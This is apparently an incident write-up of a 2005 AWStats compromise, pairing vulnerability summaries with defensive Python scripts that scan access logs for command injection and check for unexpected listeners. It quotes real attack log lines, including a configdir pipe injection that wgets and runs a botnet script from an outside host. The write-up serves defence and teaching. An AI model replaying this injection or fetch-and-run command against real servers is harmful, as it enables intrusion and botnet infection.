The Anatomy of a Hack March 2005
The vulnerabilities…
• 2005-02-25: AWStats Plugin Multiple Remote Command Execution Vulnerabilities
• 2005-02-16: AWStats Logfile Parameter Remote Command Execution Vulnerability
• 2005-02-16: AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability
• 2005-02-16: AWStats Remote Command Execution Vulnerability
• 2005-02-14: AWStats Debug Remote Information Disclosure Vulnerability
• 2005-01-15: AWStats Multiple Unspecified Remote Input Validation Vulnerabilities
AWStats Multiple Unspecified Remote Input Validation Vulnerabilities (15 Jan)
• Multiple unspecified remote input validation vulnerabilities affect AWStats. These issues are due to a failure of the application to perform proper validation on user-supplied input prior to using it to carry out some critical function.
• Although unconfirmed, an attacker may leverage these issues to execute commands and disclose sensitive information with the privileges of the underlying Web server.
AWStats Remote Command Execution Vulnerability (16 Feb)
• AWStats is reported prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.
• An attacker can prefix arbitrary commands with the '|' character and have them executed in the context of the server through a URI parameter.
The First Probe…
[05/Mar/2005:01:29:55 -0600] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
The Exploit…
[13/Mar/2005:19:17:12 -0600] "POST /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;killall%20%20perl;cd%20/tmp;wget%20ssh.a.la/botnet;perl%20botnet;rm%20botnet;echo%20;echo| HTTP/1.0" 200 414 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
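Both log lines above carry the injected value in the configdir parameter, percent-encoded. The scanner below is an added example (not part of the presentation) that decodes each query parameter in a common/combined-format access log, flags any value containing '|' or other command separators, splits the injected value into its individual commands for triage, and records whether the request got a 404 (the first probe, wrong path) or a 200 (the script answered). The two slide lines are used as input together with one constructed benign AWStats request; the 200-means-reached heuristic is an assumption that holds for this log, not a general proof of success.

```python
import re
from urllib.parse import unquote_plus

# Two log lines from the slides plus one constructed benign request, so the
# scanner has both hits and a non-hit to work on.
SAMPLE_LOG = [
    '[05/Mar/2005:01:29:55 -0600] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    # constructed, benign
    '[05/Mar/2005:02:00:00 -0600] "GET /cgi-bin/awstats.pl?config=www.example.com&output=main HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '[13/Mar/2005:19:17:12 -0600] "POST /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;killall%20%20perl;cd%20/tmp;wget%20ssh.a.la/botnet;perl%20botnet;rm%20botnet;echo%20;echo| HTTP/1.0" 200 414 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"',
]

# Common/combined log format; anything before the [timestamp] (client IP, ident,
# user) is skipped so lines with or without those fields both match.
LOG_RE = re.compile(
    r'^[^\[]*\[(?P<time>[^\]]+)\]\s+"(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+[^"]*"'
    r'\s+(?P<status>\d{3})\s+\S+'
)

# The '|' the advisory mentions plus the usual shell command separators.
SHELL_META = re.compile(r'[|;`&\n]|\$\(')


def parse_query(query):
    """Split a raw query string into {name: [decoded values]}.
    Done by hand rather than with parse_qs so that a ';' inside a value stays
    part of that value (older parse_qs versions split on it)."""
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def injected_commands(value):
    """Best-effort split of an injected value into the individual commands."""
    return [c.strip() for c in re.split(r'[;|]', value) if c.strip()]


def inspect_line(line):
    """Return a finding dict if any decoded parameter carries shell
    metacharacters, otherwise None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    # partition instead of urlsplit: a target starting with '//' would
    # otherwise be read as a host name and the path mangled
    path, _, query = m.group('target').partition('?')
    suspicious = {name: v for name, values in parse_query(query).items()
                  for v in values if SHELL_META.search(v)}
    if not suspicious:
        return None
    status = int(m.group('status'))
    return {
        'time': m.group('time'),
        'method': m.group('method'),
        'path': path,
        'status': status,
        'params': suspicious,
        # 404 (the first probe): that path did not exist on this host.
        # 200 (the exploit): awstats.pl itself handled the request.
        'reached_script': status == 200,
        'commands': [c for v in suspicious.values() for c in injected_commands(v)],
    }


def scan(lines):
    """Run inspect_line over a log and keep the findings, in order."""
    return [f for f in map(inspect_line, lines) if f]


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['method']} {f['path']} -> {f['status']}")
        for cmd in f['commands']:
            print("    ", cmd)
```

Run it against a real access log with `scan(open(path))`; expect some false positives from legitimate values that contain '&' or ';', so review the decoded `params` rather than alerting on the match alone.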
Results of Exploits
• Left lots of litter in /tmp
• Opened up multiple listeners (est. 6)
• Most were botnet daemons or backdoors
• Cleanup has been fun and educational
• No damage to the system, just had my ego dinged up a little
• Valuable reminder – Don’t get complacent
How I could have prevented it
• Stay on top of vulnerabilities
• They are always shortly followed by exploits
• Patch/Upgrade as soon as possible
• Review logs and check your file systems
• E.g. /tmp would have been an easy tip-off
• Know what listeners are running and check them regularly
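The last two points (watch /tmp, know your listeners) are the kind of check that turns this incident from a surprise into an alert. The script below is an added example, not part of the presentation: it compares the output of `ss -Hltnp` against a baseline of the listeners a host is supposed to have and lists files touched recently in a directory such as /tmp. The `SAMPLE_SS` text, the ports and pids in it, and the `BASELINE` mapping are constructed for illustration; on a real host you record the baseline from a known-clean state and run the live check from cron.

```python
import os
import re
import shutil
import subprocess
import time

# Constructed sample of `ss -H -l -t -n -p` output (-H drops the header).
# Ports 22 and 80 are the expected services; the two perl listeners on made-up
# high ports stand in for daemons like the ones the exploit on this page started.
SAMPLE_SS = """\
LISTEN 0 128 0.0.0.0:22    0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 511 *:80          *:*       users:(("httpd",pid=1045,fd=4))
LISTEN 0 5   0.0.0.0:12345 0.0.0.0:* users:(("perl",pid=4119,fd=3))
LISTEN 0 5   0.0.0.0:4711  0.0.0.0:* users:(("perl",pid=4120,fd=3))
"""

# Baseline of listeners this host should have: port -> process name.
# Hypothetical values; a real baseline is recorded from a known-clean host.
BASELINE = {22: "sshd", 80: "httpd"}

PROC_RE = re.compile(r'users:\(\("(?P<name>[^"]+)",pid=(?P<pid>\d+)')


def parse_ss(text):
    """Turn `ss -Hltnp` lines into dicts with address, port, process and pid."""
    listeners = []
    for line in text.splitlines():
        fields = line.split(None, 5)
        if len(fields) < 5:
            continue
        # rpartition keeps IPv6 forms such as [::]:22 intact
        addr, _, port = fields[3].rpartition(':')
        m = PROC_RE.search(fields[5]) if len(fields) > 5 else None
        listeners.append({
            'addr': addr, 'port': int(port),
            'proc': m.group('name') if m else None,
            'pid': int(m.group('pid')) if m else None,
        })
    return listeners


def unexpected_listeners(text, baseline):
    """Listeners whose port is not in the baseline or is held by a different
    program than the baseline says."""
    return [l for l in parse_ss(text) if baseline.get(l['port']) != l['proc']]


def filter_recent(entries, now, hours):
    """entries: iterable of (path, mtime). Return the paths modified within
    the last `hours`, sorted."""
    cutoff = now - hours * 3600
    return sorted(p for p, mtime in entries if mtime >= cutoff)


def recent_files(directory, hours=24):
    """Files directly under `directory` (e.g. /tmp) touched within `hours`."""
    entries = []
    with os.scandir(directory) as it:
        for e in it:
            try:
                entries.append((e.path, e.stat(follow_symlinks=False).st_mtime))
            except OSError:
                pass  # vanished or unreadable; skip rather than abort the check
    return filter_recent(entries, time.time(), hours)


def live_ss_output():
    """Run ss if it is installed; None otherwise (the sample is used then)."""
    if shutil.which('ss') is None:
        return None
    return subprocess.run(['ss', '-H', '-l', '-t', '-n', '-p'],
                          capture_output=True, text=True).stdout


if __name__ == '__main__':
    text = live_ss_output() or SAMPLE_SS
    for l in unexpected_listeners(text, BASELINE):
        print(f"unexpected listener: port {l['port']} on {l['addr']} "
              f"held by {l['proc']} (pid {l['pid']})")
    for path in recent_files('/tmp', hours=24):
        print(f"recently modified in /tmp: {path}")
```

Process names and pids only appear in `ss -p` output when the check runs with enough privilege to see other users' sockets, so run it as root (or the baseline comparison will report every port as held by None).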